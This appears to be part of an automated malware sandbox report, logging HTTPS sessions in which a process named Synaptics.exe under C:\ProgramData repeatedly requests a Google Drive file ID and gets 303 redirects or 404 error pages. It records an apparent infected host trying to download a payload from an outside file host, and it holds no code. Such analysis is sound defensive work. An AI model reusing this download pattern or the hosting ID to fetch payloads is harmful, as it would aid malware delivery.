                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      81192.168.2.1150044142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:53 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:54 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6XEe4RhX42xTNE9domJU0eLuYzfZ78rmXMLbZ-pedMBBgSfR2uPjZdEOBmqrqmmisnoIe0BcM
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:54 GMT
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-9nlj1GBjXGNUvF09q5Whrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:54 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:54 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 47 50 77 71 77 77 5a 4f 49 51 54 6f 5a 4c 58 41 35 51 30 4f 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="GGPwqwwZOIQToZLXA5Q0OQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:54 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      82192.168.2.1150045142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:53 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:54 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC5_OJ-cVcgChkWmhLs4YNM-FVDAL4T9Hwj9hiZ-wYt6jO65Ihr3vg4-vDKOiL9-N8RR
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:53 GMT
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-aDqmbB-n_XGalbm7iEHvIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:54 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                      2024-12-30 10:25:54 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 62 4a 68 34 6f 51 75 4b 51 74 7a 33 59 31 50 30 65 59 4a 67 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="-bJh4oQuKQtz3Y1P0eYJgw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                      2024-12-30 10:25:54 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      83192.168.2.1150053172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:54 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:54 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:54 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-RJnQ6F2ZXjaV8d3m0EGMWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      84192.168.2.1150054172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:54 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      85192.168.2.1150056142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:54 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      86192.168.2.1150057142.250.181.2254437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:54 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:55 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC55eM4_g_1BO9gnK_9XU3zuySkRUKuSNUhhZhV_tutUfozkP09_FIIy7gjFE59tdkaYqzJtzgo
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:55 GMT
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-MZOnETiskmyBT6f1Wr70Xg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:55 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:55 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 70 6a 45 70 71 68 56 58 71 59 55 4c 76 39 59 44 51 6f 77 34 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="ipjEpqhVXqYULv9YDQow4Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:55 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      87192.168.2.1150066172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:55 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:55 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:55 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-fVb-tNPd7WhvVbR6wVxMpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      88192.168.2.1150067172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:55 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:56 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:55 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-eEltiTDPxdOjxibOC96ZSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      89192.168.2.1150073172.217.18.1104437604C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-30 10:25:56 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
